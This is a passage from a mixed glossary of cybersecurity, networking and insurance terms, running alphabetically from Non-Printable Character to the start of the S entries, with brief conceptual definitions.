A Non-Printable Character is a character that doesn’t have a corresponding character letter to its corresponding ASCII code. Examples would be the Linefeed, ASCII character code 10 decimal, the Carriage Return, 13 decimals, or the bell sound, decimal 7. On a PC, you can often add non-printable characters by holding down the Alt key, and typing in the decimal value (i.e., Alt-007 gets you a bell). There are other character encoding schemes, but ASCII is the most prevalent.
Non-Repudiation
Non-Repudiation refers to the ability of a system to prove that a specific user and only that specific user sent a message and that it hasn’t been modified. On the Internet, a digital signature is used not only to ensure that a message or document has been electronically signed by the person, but also, since a digital signature can only be created by one person, to ensure that a person cannot later deny that they furnished the signature.
Notional Value
The principal value of future payments is based on a derivative transaction as at a specific period (the "as of" reporting date) in the reporting currency.
Null Session
A Null session is also known as Anonymous Logon. It is a method that allows an anonymous user to retrieve information such as usernames and share this over the network or connect without authentication. Null sessions are one of the most commonly used methods for network exploration employed by “hackers.” A null session connection allows you to connect to a remote machine without using a username or password. Instead, you are given anonymous or guest access.
O
Octet
An octet is a unit of digital information that consists of eight bits. Octets are generally displayed using a variety of representations, for example in the hexadecimal, decimal, or octal number systems. The binary value of all 8 bits set (or turned on) is 11111111, equal to the hexadecimal value FF, the decimal value 255, and the octal value 377. One octet can be used to represent decimal values ranging from 0 to 255.
One-Way Encryption
One-way encryption or one-way hash function is designed in a manner that it is hard to reverse the process, that is, to find a string that hashes to a given value (hence the name one-way). A good hash function makes it hard to find two strings that would produce the same hash value.
One-Way Function
A one-way function is any function that is easy to compute on every input, but hard to invert given the image of a random input.
Open Shortest Path First
An Open Shortest Path First (OSPF) is a routing protocol for IP networks and uses a link-state routing algorithm. It falls into the group of interior routing protocols, operating within a single autonomous system (AS). OSPF is the most common interior gateway protocol (IGP) in large enterprise networks.
Open Source
a type of software whose source code is made freely available to anyone to study, modify, and distribute. This means that the code can be viewed and altered by anyone, and the resulting software is often distributed for free. Examples of open-source code are Bitcoin, Mozilla Firefox, Joomla, and WordPress
Operating system
An operating system (OS) is system software that manages a computer’s resources and processes. They are also responsible for your computer’s ability to run and execute programs. Operating systems enable you to communicate with your computer without needing to speak your computer’s language.
Option
An agreement giving the buyer the right to buy or receive, sell, or deliver, enter into, extend, or terminate, or effect a cash settlement based on the actual or expected price, level, performance, or value of one or more Underlying Interests.
OSI
OSI stands for Open System Interconnection and is an ISO standard for worldwide communications. OSI defines a networking framework for implementing protocols in seven layers. OSI defines seven layers of functions that take place at each end of a communication. Although OSI is not always strictly adhered to in terms of keeping related functions together in a well-defined layer, many products involved in telecommunication attempt to describe themselves in relation to the OSI model.
OSI Layers
The Open System Interconnection (OSI) model defines a networking framework to implement protocols in seven layers. Control is passed from one layer to the next, starting at the application layer in one station, and proceeding to the bottom layer, over the channel to the next station and back up the hierarchy. The OSI model takes the task of internetworking and divides that up into what is referred to as a vertical stack that consists of the following layers.
OSPF
An Open Shortest Path First (OSPF) is a routing protocol for IP networks and uses a link-state routing algorithm. It falls into the group of interior routing protocols, operating within a single autonomous system (AS). OSPF is the most common interior gateway protocol (IGP) in large enterprise networks.
Other Underwriting Expenses
Allocable expenses other than loss adjustment expenses and investment expenses.
Overload
Overload is the limitation of system operation by excessive burden on a system component's performance capabilities.
P
Package Policy
Two or more distinct policies combined into a single contract.
Packet
A packet is a term used to describe a segment of data sent from one computer or device to another over a network.
Packet Switched Network
A packet switched network (PSN) is a computer communications network that groups and sends data in the form of small packets. It enables sending of data packets between a source and destination node over a channel that is shared between multiple users and/or applications. A packet switched is also known as a connectionless network, as it does not create a permanent connection between a source and destination node.
PAP
Password Authentication Protocol (PAP) is the most basic form of authentication in which a user’s name and password are transmitted over a network and compared to a table of name-password pairs. The basic authentication feature built into the HTTP protocol uses PAP.
Par Value
The nominal or face value of a stock or bond.
Parasitic Viruses
Parasitic viruses, also known as file viruses, spread by attaching themselves to programs.
Partitions
Partitioning is the division of a computer hard disk or other secondary storage into one or more regions. Many computers have hard disk drives with only a single partition, but others have multiple partitions so that an OS can manage information in each region separately. Each partition then appears in the OS as a distinct logical disk that uses part of the actual disk.
Passive Attack
A passive attack is a network attack in which a system is monitored and sometimes scanned for open ports and vulnerabilities. The purpose is solely to gain information about the target and no data is changed on the target.
Password Authentication Protocol
Password Authentication Protocol (PAP) is the most basic form of authentication in which a user’s name and password are transmitted over a network and compared to a table of name-password pairs. The basic authentication feature built into the HTTP protocol uses PAP.
Password Cracking
Password cracking is the process of trying to guess or crack passwords to gain access to a computer system or network. Crackers generally use a variety of tools, scripts, or software to crack a system password. Password cracks work by comparing every encrypted dictionary word against the entries in system password file until a match is found.
Password Sniffing
Password sniffing is a technique used to gain knowledge of passwords that involves monitoring traffic on a network to pull out information. There are several software’s available for automatic password sniffing.
Patch
A patch is a set of changes to software, or its supporting data designed to update, fix, or improve it.
Patching
Patching is the process of updating software to a different version. It is also referred to as updating the software to the latest version available and is key in removing bugs of the previous version.
Payload
The payload is the part of transmitted data that contains the intended message.
Penetration
Penetration is defined as gaining unauthorized logical access to sensitive data by evading a system’s protections.
Penetration Testing
A security assessment method to test, measure, and enhance established security measures on information systems.
Peril
The cause of property damage or personal injury, origin of desire for insurance. "Cause of Loss".
Permutation
Permutation is a technique that keeps the same letters but changes the position within a text to scramble the message.
Personal Firewall
Personal firewalls are those firewalls that are installed and run on individual computers. A personal firewall is an application which controls network traffic to and from a computer, permitting or denying communications based on a security policy. Typically, it works as an application layer firewall.
Personal GAP Insurance
Credit insurance that insures the excess of the outstanding indebtedness over the primary property insurance benefits in the event of a total loss to a collateral asset.
Personal Property
Single interest or dual interest credit insurance (where collateral is not a motor vehicle, mobile home, or real estate) that covers perils to goods purchased or used as collateral and that concerns a creditor's interest in the purchased goods or pledged collateral either in whole or in part; or covers perils to goods purchased in connection with an open-end credit transaction.
Pharming
Pharming is defined as a cyber-attack that is intended to redirect a website’s traffic to a masquerading website, which may be a fake one. Pharming is achieved by corrupting a DNS server on the Internet and steering a URL to the masked website’s IP. Generally, all users use a URL like www.worldbank.com instead of the real IP (192.86.99.140) of the website. The URL can be redirected to send traffic to the IP of the pseudo website by substituting the pointers on a DNS server. The transactions can be imitated and information like login credentials can be gathered at the pseudo site. Using the information gathered, the attacker can access the real site and conduct transactions using the credentials of a valid user.
Phishing
Phishing is a method of trying to gather sensitive information using deceptive emails and websites.
Phishing Emails
Phishing refers to the process of deceiving recipients into sharing sensitive information with an unknown third party (cybercriminal).
Ping of Death
A ping of death is an attack that involves sending a distorted or otherwise malicious ping to a computer with the intent of overflowing the input buffers of the destination machine and causing it to crash. A ping of death is fragmented into groups of 8 octets before transmission.
Ping Sweep
A ping sweep is also known as an ICMP sweep. It is a basic network scanning technique used to determine which of a range of IP addresses maps to live network hosts.
Ping Scan
A ping scan looks for machines that are responding to ICMP Echo Requests.
Plaintext
In cryptography, plaintext or cleartext is unencrypted information.
Point-to-Point Protocol
Point-to-Point Protocol (PPP) is a communication protocol between two computers that uses a serial interface, typically a personal computer connected by a phone line to a server. PPP uses the Internet protocol (IP) and is sometimes considered a member of the TCP/IP suite of protocols.
Point-to-Point Tunneling Protocol
The Point-to-Point Tunneling Protocol (PPTP) is an approach used to implement virtual private networks (VPN). PPTP uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets.
Poison Reverse
Poison reverse is a method where the gateway node communicates its neighbor gateways that one of the gateways is no longer connected. The notifying gateway sets the number of hops to the unconnected gateway to a number that indicates “infinite.” In effect, advertising the fact that their routes are not reachable.
Policy
A written contract ratifying the legality of an insurance agreement.
Policy Dividend
A refund of part of the premium on a participating life insurance policy. The amount of payment is determined by subtracting the actual premium expense from the premium charged. The payment can be taken as cash, applied to a purchase an increment of paid-up insurance, left on deposit with the insurance company or applied to purchase term insurance for one year.
Policy Period
Time period during which insurance coverage is in effect.
Policy Reserve
The amount of money allocated specifically for the fulfillment of policy obligations by a life insurance company; reserves are in place to safeguard that the company can pay all future claims.
Policyholders Surplus
Assets in excess of the liabilities of a company or net income above any monies indebted to legal obligation.
PPP
Point-to-Point Protocol (PPP) is a communication protocol between two computers that uses a serial interface, typically a personal computer connected by a phone line to a server. PPP uses the Internet protocol (IP) and is sometimes considered a member of the TCP/IP suite of protocols.
PPTP
The Point-to-Point Tunneling Protocol (PPTP) is an approach used to implement virtual private networks (VPN). PPTP uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets.
PSN
A packet switched network (PSN) is a computer communications network that groups and sends data in the form of small packets. It enables sending of data packets between a source and destination node over a channel that is shared between multiple users and/or applications. A packet switched is also known as a connectionless network, as it does not create a permanent connection between a source and destination node.
PERL
Perl is a family of high-level, general-purpose, dynamic programming languages. These languages include Perl 5 and Perl 6. Perl was originally developed by Larry Wall in 1987 as a general-purpose Unix scripting language.
PFS
Public-Key Forward Secrecy (PFS) is a key agreement protocol based on asymmetric cryptography. It ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
PGP
Pretty Good Privacy (PGP) TM is a trademark data encryption and decryption program. This program provides cryptographic privacy and authentication for data communication. It was created by Phil Zimmermann in 1991. PGP is generally used for encrypting and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications.
PKI
Public Key Infrastructure (PKI) supports the identification and distribution of public encryption keys.
Polyinstantiation
Polyinstantiation is the ability of a database to maintain multiple records with the same key. It is used to prevent inference attacks. It may also indicate, such as in the case of database polyinstantiation, that two different instances have the same name (identifier, primary key)
Polymorphism
Polymorphism is the process where malicious software changes its underlying code to avoid detection. A polymorphic type is one whose operations can also be applied to values of some other type, or types.
POP3
Post Office Protocol, Version 3 (POP3) is an Internet Standard protocol through which a client workstation can access a mailbox on a server host to retrieve mail messages that the server has received and is holding for the client.
Port
A port is an end point of communication in an operating system. It is identified for each address and protocol by a 16-bit number, commonly known as the port number.
Port Scan
A port scan is a sequence of messages sent by an attacker attempting to break into a computer. Port scanning provides the attacker with an idea where to probe for weaknesses. A port scan consists of sending a message to each port, one at a time.
Possession
Possession is the holding, control, and ability to use information.
Post Office Protocol Version 3
Post Office Protocol, Version 3 (POP3) is an Internet Standard protocol through which a client workstation can access a mailbox on a server host to retrieve mail messages that the server has received and is holding for the client.
Potentially Unwanted Application
Potentially unwanted applications are programs that are not malicious but may be unsuitable for use in a business environment and may create security concerns.
Practical Extraction and Reporting Language
Perl is a family of high-level, general-purpose, dynamic programming languages. These languages include Perl 5 and Perl 6. Perl was originally developed by Larry Wall in 1987 as a general-purpose Unix scripting language.
Preamble Pretty Good Privacy
Pretty Good Privacy (PGP) TM is a trademark data encryption and decryption program. This program provides cryptographic privacy and authentication for data communication. It was created by Phil Zimmermann in 1991. PGP is generally used for encrypting and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications.
Preferred Provider Organization (PPO)
Arrangement insured or uninsured, where contracts are established by Health Plan Companies (typically, commercial insurers, and, in some circumstances, by self-insured employers) with health care providers. The Health Plans involved will often designate these contracted providers as "preferred" and will provide an incentive, usually in the form of lower deductibles or co-payments, to encourage covered individuals to use these providers. Members are allowed benefits for non-participating provider services on an indemnity basis with significant copayments and providers are often, but not always, paid on a discounted fee for service basis.
Preferred Risk
Insured, or applicant for insurance, who presents likelihood of risk lower than that of the standard applicant.
Premium
Money charged for the insurance coverage reflects expectation of loss.
Premiums Earned
The portion of premium for which the policy protection or coverage has already been given during the now-expired portion of the policy term.
Premiums Net
Is the amount calculated on the basis of the interest and mortality table used to calculate the reporting entity's statutory policy reserves.
Premiums Written
Total premiums generated from all policies (contracts) written by an insurer within a given period.
Primary Insurance
Coverage that takes precedence when more than one policy covers the same loss.
Prior Approval Law
A state regulatory requirement for pre-approval of all insurance rates and forms.
Private Addressing
IANA has set aside three address ranges for use by private or non-Internet connected networks. This is referred to as Private Address Space and is defined in RFC 1918. The reserved address blocks are: 10.0.0.0 to 10.255.255.255 (10/8 prefix) 172.16.0.0 to 172.31.255.255 (172.16/12 prefix) 192.168.0.0 to 192.168.255.255 (192.168/16 prefix).
Producer
An individual who sells, services, or negotiates insurance policies either on behalf of a company or independently.
Product Liability
Insurance coverage protecting the manufacturer, distributor, seller, or lessor of a product against legal liability resulting from a defective condition causing personal injury, or damage, to any individual or entity, associated with the use of the product.
Professional Errors and Omissions Liability
Coverage available to pay for liability arising out of the performance of professional or business-related duties, with coverage being tailored to the needs of the specific profession. Examples include abstracters, accountants, insurance adjusters, architects, engineers, insurance agents and brokers, lawyers, real estate agents, stockbrokers.
Programming
A technological process for telling a computer which tasks to perform to solve problems. You can think of programming as a collaboration between humans and computers, in which humans create instructions for a computer to follow (code) in a language computer can understand.
Program Infector
A program infector is a piece of malware (or virus) that attaches itself to existing program files. Once the original infected program is run the virus transfers to the computer memory and may replicate itself further, spreading the infection. This type of virus can be spread beyond one’s system as soon as the infected file or program is passed to another computer.
Program Policy
A program policy is a high-level policy that sets the overall tone of an organization’s security approach.
Promiscuous Mode
Promiscuous mode allows a network device to intercept and read each network packet that reaches in its entirety. This is used by network administrators to diagnose network problems, but also by unsavory characters who are trying to eavesdrop on network traffic (which might contain passwords or other information).
Property
Coverage protecting the insured against loss or damage to real or personal property from a variety of perils, including but not limited to fire, lightening, business interruption, loss of rents, glass breakage, tornado, windstorm, hail, water damage, explosion, riot, civil commotion, rain, or damage from aircraft or vehicles.
Proprietary Information
Proprietary information is information unique to a company and its ability to compete, such as customer lists, technical data, product costs, and trade secrets.
Protected Cell
An insurance-linked security retained within the insurance or reinsurance company and is used to insulate the proceeds of the securities offering from the general business risks of the insurer, granting an additional comfort level for investors of the securitized instrument.
Protocol
A protocol is a special set of rules that end points in a telecommunication connection used when they communicate. Protocols specify interactions between the communicating entities. Protocols exist at several levels in a telecommunication connection.
Protocol Stacks
Protocol Stacks are a set of network protocol layers that work together.
Provisions
Contingencies outlined in an insurance policy.
Proximate Cause
Event covered under insured's policy agreement.
Proxy Server
A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers.
PUA
Potentially unwanted applications are programs that are not malicious but may be unsuitable for use in a business environment and may create security concerns.
Public Adjuster
Independent claims adjuster representing policyholders instead of insurance companies.
Public Key
A Public Key is the publicly disclosed component of a pair of cryptographic keys used for asymmetric cryptography.
Public Key Encryption
Public Key Encryption is also known as asymmetric cryptography. Public key encryption is a cryptographic system that uses two keys, a public key known to everyone, and a private or secret key known only to the recipient of the message
Public-Key Forward Secrecy
Public-Key Forward Secrecy (PFS) is a key agreement protocol based on asymmetric cryptography. It ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
Public Key Infrastructure
Public Key Infrastructure (PKI) supports the identification and distribution of public encryption keys.
Pure Premium
That portion of the premium equal to expected losses void of insurance company expenses, premium taxes, contingencies, or profit margin.
Pure Risk
Circumstance including possibility of loss or no loss but no possibility of gain.
Q
QAZ
A QAZ is a network worm.
Qualified Actuary
A person who meets the basic education, experience and continuing education requirements (these differ by line of business) of the Specific Qualification Standard for Statements of Actuarial Opinion, NAIC Property and Casualty Annual Statement, as set forth in the Qualification Standards for Actuaries Issuing Statements of Actuarial Opinion in the United States, promulgated by the American Academy of Actuaries, and is in good standing of the American Academy of Actuaries who has been approved as qualified for signing casualty loss reserve opinions by the Casualty Practice Council of the American Academy of Actuaries.
R
Race Condition
Race Condition is also known as race hazard. Race Condition is the behavior of an electronic, software, or other system where the output is dependent on the sequence or timing of other uncontrollable events. This becomes a bug when events don’t happen in the order the programmer planned. Race conditions can occur in electronics systems, especially logic circuits, and in computer software, especially multithreaded or distributed programs.
Radiation Monitoring
Radiation monitoring is the process of receiving images, data, or audio from an unprotected source by snooping to radiation signals.
Ransomware
Type of malicious software that blocks access to your files or computer until a ransom is paid. However, there's no guarantee that paying a ransom will allow you to unlock your files or computer.
Ransomcloud
a special type of ransomware, designed to encrypt cloud emails and attachments.
Rate
Value of insured losses expressed as a cost per unit of insurance.
Rebate
A refund of part or all of a premium payment.
Reconnaissance
Reconnaissance is the phase of an attack where an attacker can locate new systems, maps out several networks, and probes for specific vulnerabilities in the system or network. It is used to obtain information by visual observation or other detection methods about an attacker's activities and resources.
Red Team
A group authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s cybersecurity posture.
Redundancy
An additional system that maintains a degree of overall functionality in case of loss or failure of another system.
Reflexive ACLs (Cisco)
Reflexive access lists are an important part of securing the network against network hackers and are generally included in a firewall defense. Reflexive access lists provide a level of security against spoofing and denial-of-service attacks. Reflexive ACLs for Cisco routers are a step towards making the router act like a stately firewall. The router makes filtering decisions based on whether connections are a part of established traffic or not.
RARP
Reverse Address Resolution Protocol (RARP) is a protocol where a physical machine in a local area network (LAN) can request to learn its IP address from a gateway server’s Address Resolution Protocol (ARP) table or cache. When a new machine is set up, its RARP client program requests from the RARP server on the router to be sent its IP address.
RBC Ratio
Ratio is used to identify insurance companies that are poorly capitalized. Calculated by dividing the company's capital by the minimum amount of capital regulatory authorities have deemed necessary to support the insurance operations.
Registry
Registry is a system-defined database where applications and system components store and retrieve configuration data. Applications use the registry API to retrieve, modify, or delete registry data.
Regression Analysis
The scripted tests used to test software for all possible input should be expected. Typically, developers will create a set of regression tests that are executed before a new version of a software is released.
Reinsurance
A transaction between a primary insurer and another licensed (re) insurer where the reinsurer agrees to cover all or part of the losses and/or loss adjustment expenses of the primary insurer. The assumption is in exchange for a premium. Indemnification is on a proportional or non-proportional basis.
Reinsurer
Company assuming reinsurance risk.
Remote Access
The ability to access a computer from a remote location.
Renewable Term Insurance
Insurance that is renewable for a limited number of successive terms by the policyholder and is not contingent upon medical examination.
Reported Losses
Includes both expected payments for losses relating to insured events that have occurred and have been reported to the insurance company, but not yet paid.
Request for Comment
A Request for Comments (RFC) is a type of publication from the Internet Engineering Task Force (IETF) and the Internet Society. An RFC is authored by engineers and computer scientists in a memorandum describing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. RFC started in 1969, when the Internet was the ARPANET.
Reserve
A portion of the premium was retained to pay future claims.
Reserve Credit
Reduction of reserve amounts for reinsurance ceded. Reductions may include the claim reserve and/or the unearned premium reserve.
Residual Market Plan
Method devised for coverage of greater than average risk individuals who cannot obtain insurance through normal market channels.
Resource Exhaustion
Resource exhaustion is a kind of attack where the attacker or hacker ties up finite resources on a system, making them unavailable to others.
Response
A response is information sent in response to some stimulus.
Retention
A mechanism of internal fund allocation for loss exposure used in place of or as a supplement to risk transfer to an insurance company.
Retrocession
The portion of risk that a reinsurance company cedes or amount of insurance the company chooses not to retain.
Retrospective Rating
The process of determining the cost of an insurance policy based on the actual loss experience determined as an adjustment to the initial premium payment.
Reverse Address Resolution Protocol
Reverse Address Resolution Protocol (RARP) is a protocol where a physical machine in a local area network (LAN) can request to learn its IP address from a gateway server’s Address Resolution Protocol (ARP) table or cache. When a new machine is set up, its RARP client program requests from the RARP server on the router to be sent its IP address.
Reverse Engineering
Reverse engineering is also known as the “Back Engineering” and is the process of extracting design information or any kind of sensitive information by disassembling and analyzing the design of a system component.
Reverse Lookup
The Reverse Lookup is used to locate the hostname that corresponds to a particular IP address. Reverse lookup uses an IP (Internet Protocol) address to find a domain name.
Reverse Proxy
A reverse proxy is a device or service placed between a client and a server in a network. All the incoming HTTP requests are handled by the proxy (back-end webservers), so the proxy can then send the content to the end-user.
RFC
A Request for Comments (RFC) is a type of publication from the Internet Engineering Task Force (IETF) and the Internet Society. An RFC is authored by engineers and computer scientists in a memorandum describing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. RFC started in 1969, when the Internet was the ARPANET.
Rider
An amendment to a policy agreement.
RIP
The Routing Information Protocol (RIP) defines a manner for routers to share information on how to route traffic among various networks. RIP is classified by the Internet Engineering Task Force (IETF) as an Interior Gateway Protocol (IGP), one of several protocols for routers moving traffic around within a larger autonomous system network.
Risk
Uncertainty concerning the possibility of loss by a peril for which insurance is pursued.
Risk Assessment
Risk assessment is a systematic process to analyze and identify any possible threats or risks that may leave sensitive information vulnerable to attacks. It also employs methods to calculate the risk impact and eliminate such threats.
Risk Averse
Risk averse means avoiding risks even if this leads to the loss of opportunity. An example is using a (more expensive) phone call vs. sending an e-mail in order to avoid risks associated with e-mail may be considered “Risk Averse.”
Risk Based Capital Ratio
Ratio is used to identify insurance companies that are poorly capitalized. Calculated by dividing the company's capital by the minimum amount of capital regulatory authorities have deemed necessary to support the insurance operations.
Risk Retention Act
A 1986 federal statute amending portions of the Product Liability Risk Retention Act of 1981 and enacted to make organization of Risk Retention Groups and Purchasing Groups more efficient.
Risk Retention Group
Group-owned insurers organized to assume and spread the liability risks to its members.
Rivest-Shamir-Adleman
Rivest-Shamir-Adleman (RSA) is one of the first practical public-key cryptosystems and is widely used for secure data transmission. RSA is an algorithm for asymmetric cryptography, invented in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman. This is based on the practical difficulty of factoring the product of two large prime numbers, the factoring problem.
Role Based Access Control
Role based access control (RBAC) assigns users to roles based on their organizational functions and determines authorization based on those roles. It is used by enterprises with more than 500 employees, and can implement mandatory access control (MAC) or discretionary access control (DAC
Root
Root is the username or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the super user.
Rootkit
A rootkit is a type of malware that gives a threat actor remote access to and control over a computer or other system.
Router
A router is a device that forwards or transfers data packets across networks. A router is connected to at least two networks, commonly two LANs or WANs or a LAN and its ISP’s network. Routers are located at gateways, the places where two or more networks connect.
Routing Information Protocol
The Routing Information Protocol (RIP) defines a manner for routers to share information on how to route traffic among various networks. RIP is classified by the Internet Engineering Task Force (IETF) as an Interior Gateway Protocol (IGP), one of several protocols for routers moving traffic around within a larger autonomous system network.
Routing Loop
A routing loop is where two or more poorly configured routers repeatedly exchange the same data packet over and over. In the case of distance vector protocols, the fact that these protocols are routed by rumor and have a slow convergence time can cause routing loops.
RPC Scans
RPC scans determine which RPC services are running on a machine.
RSA
Rivest-Shamir-Adleman (RSA) is one of the first practical public-key cryptosystems and is widely used for secure data transmission. RSA is an algorithm for asymmetric cryptography, invented in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman. This is based on the practical difficulty of factoring the product of two large prime numbers, the factoring problem.
RSBAC
Rule Set Based Access Control (RSBAC) targets actions based on rules for entities operating on objects. RSBAC is an open-source access control framework for current Linux kernels, which has been in stable production use since January 2000.
Rule Set Based Access Control
Rule Set Based Access Control (RSBAC) targets actions based on rules for entities operating on objects. RSBAC is an open-source access control framework for current Linux kernels, which has been in stable production use since January 2000.
Runtime Protection
Runtime protection blocks attempts to access vulnerable parts of your computer.
S
S/Key
An S/KEY is a one-time password mechanism developed for authentication to Unix-like operating systems, particularly from dumb terminals or untrusted public computers. This mechanism uses a cryptographic hash function to generate a sequence of 64-bit, one-time passwords for remote user login. Since each password is only used once, the user is protected from password sniffers.
S/MIME
An S/MIME is a set of specifications for securing electronic mail. Secure/ Multipurpose Internet Mail Extensions (S/MIME) is based upon the widely used MIME standard and describes a protocol for adding cryptographic security services through MIME encapsulation of digitally signed and encrypted objects. The basic security services offered by S/MIME are authentication, non-repudiation of origin, message integrity, and message privacy. Optional security services include signed receipts, security labels, secure mailing lists, and an extended method of identifying the signer’s certificate(s)
Safeguarding Statement
A safeguarding statement is a statement affixed to a computer output or printout that states the highest classification being processed at the time the product was produced and requires control of the product, at that level, until determination of the true classification by an authorized individual. Synonymous with banner
Safeguards
Safeguards are protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.
Safety
Safety is defined as the requirement to ensure that the individuals involved with an organization, including employees, customers, and visitors, are safeguarded from any kind of malicious act or attack.
Salt
Salt is a non-secret value that is used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an Attacker.
Salvage
Value recoverable after a loss.
Sandboxing
Sandboxing is a method of isolating application modules into distinct fault domains enforced by software.
Sanitization
Sanitization is the process to remove information from media such that information recovery is not possible. It includes removing all labels, markings, and activity logs. A general term referring to the actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.
Scanning
Scanning is sending packets or requests to another system to gain information to be used in a subsequent attack.
Scatternet
Scatternet is a chain of piconets created by allowing one or more Bluetooth devices to each be a slave in one piconet and act as the master for another piconet simultaneously. A scatternet allows several devices to be networked over an extended distance.
Scavenging
Scavenging is the process of searching through data residue in a system or a network to gain unauthorized knowledge of sensitive information.
Scoping Guidance
Scoping guidance is a part of tailoring guidance providing organizations with specific policy/regulatory-related, technology-related, system component allocation-related, operational/environmental-related, physical infrastructure-related, public access-related, scalability-related, common control-related, and security objective-related considerations on the applicability and implementation of individual security controls in the security control baseline. Scoping Guidance is also specific factors related to technology, infrastructure, public access, scalability, common security controls, and risk that can be considered by organizations in the applicability and implementation of individual security controls in the security control baseline.
Security Audit
A security audit is an evaluation of the security of a company's information system by measuring how well it conforms to a set of established criteria.
Script
A set of instructions that are interpreted by a program.
Secret Key
A secret key is one used with a secret-key (symmetric) cryptographic algorithm uniquely associated with one or more entities and not made public. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure. A secret key is also a cryptographic key used with a symmetric cryptographic algorithm uniquely associated with one or more entities and not made public. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure. A secret key is also a cryptographic key that must be protected from unauthorized disclosure to protect data encrypted with the key. The use of the term “secret” in this context does not imply a classification level; rather, the term implies the need to protect the key from disclosure or substitution. A secret key is also cryptographic key that is uniquely associated with one or more entities. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure or substitution. Secret Key – A cryptographic key, used with a secret key cryptographic algorithm, that is uniquely associated with one or more entities and should not be made public.
Secret Key (Symmetric) Cryptographic Algorithm
Secret Key (symmetric) Cryptographic Algorithm is a cryptographic algorithm that uses a single secret key for both encryption and decryption. A cryptographic algorithm that uses a single key (i.e., a secret key) for both encryption and decryption.
Secret Seed
A secret seed is a secret value used to initialize a pseudorandom number generator.
Secure Communication Protocol
Secure Communication Protocol is a communication protocol that provides the appropriate confidentiality, authentication, and content-integrity protection.
Secure Communications
Secure Communications are telecommunications deriving security through NSA-approved products and/or Protected Distribution Systems. Configuring and operating DNS servers so that the security goals of data integrity and source authentication are achieved and maintained.
Secure Electronic Transactions
A Secure Electronic Transaction (SET) is a communications protocol standard for securing credit card transactions over insecure networks. SET ensures that all parties (customers, merchant, and bank) are authenticated using digital signatures, encryption protects the message and provides integrity, and provides end-to-end security for credit card transactions online.
Secure Erase
Secure erase is an overwrite technology using firmware-based process to overwrite a hard drive. Is a drive command defined in the ANSI ATA and SCSI disk drive interface specifications, which runs inside drive hardware. It completes in about 1/8 the time of 5220 block erasure.
Secure Hash Algorithm
Secure Hash Algorithm (SHA) is a hash algorithm with the property that is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.
Secure Hash Standard
The secure hash standard specifies secure hash algorithms -SHA-1, SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224 and SHA-512/256 -for computing a condensed representation of electronic data (message). When a message of any length less than 2 64 bits (for SHA-1, SHA224 and SHA-256) or less than 2 128 bits (for SHA-384, SHA-512, SHA-512/224 and SHA-512/256) is input to a hash algorithm, the result is an output called a message digest. The message digests range in length from 160 to 512 bits, depending on the algorithm. Secure hash algorithms are typically used with other cryptographic algorithms, such as digital signature algorithms and keyed-hash message authentication codes, or in the generation of random numbers (bits). The hash algorithms specified in this Standard are called secure because, for a given algorithm, it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest. Any change to a message will, with an extremely high probability, result in a different message digest. This will result in a verification failure when the secure hash algorithm is used with a digital signature algorithm or a keyed-hash message authentication algorithm. In addition, a secure hash standard is a specification for a secure hash algorithm that can generate a condensed message representation called a message digest.
Secure Socket Shell
Software that allows administrators to securely access a remote computer.
Secure Sockets Layer
SSL or Secure Socket Layer is the standard security protocol for establishing an encrypted communication between a web server.
Secure Sockets Layer
A Secure Sockets Layer (SSL) is the standard security technology for establishing an encrypted link between a web server and a browser. SSL was developed by Netscape for transmitting private documents via the Internet.
Secure State
A secure state is a condition in which no subject can access any object unauthorizedly.
Secure Subsystem
A secure subsystem is a subsystem containing its own implementation of the reference monitor concept for those resources it controls. Secure subsystem must depend on other controls and the base operating system for the control of subjects and the more primitive system objects.
Securitization of Insurance Risk
A method for insurance companies to access capital and hedge risks by converting policies into securities that can be sold in financial markets.
Security Association
A Security Association is a relationship established between two or more entities to enable them to protect data they exchange.
Security Attribute
A Security Attribute is a security-related quality of an object. Security attributes may be represented as hierarchical levels, bits in a bit map, or numbers. Compartments, caveats, and release markings are examples of security attributes. A security attribute is also an abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system which are used to enable the implementation of access control and flow control policies; reflect special dissemination, handling, or distribution instructions; or support other aspects of the information security policy.
Security Authorization Boundary
A security authorization boundary is an information security area that includes a grouping of tools, technologies, and data.
Security Banner
A security banner is a banner at the top or bottom of a computer screen that states the overall classification of the system in large, bold type. A security banner can also refer to the opening screen that informs users of the security implications of accessing a computer resource.
Security Categorization
Security categorization is the process of determining the security category for information or an information system. The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.
Security Category
Security category is the characterization of information, or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, or individuals. It is also the characterization of information, or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, individuals, other organizations, and the Nation.
Security Concept of Operations
Security Concept of Operations is a security-focused description of an information system, its operational policies, classes of users, interactions between the system and its users, and the system’s contribution to the operational mission.
Security Control Assessment
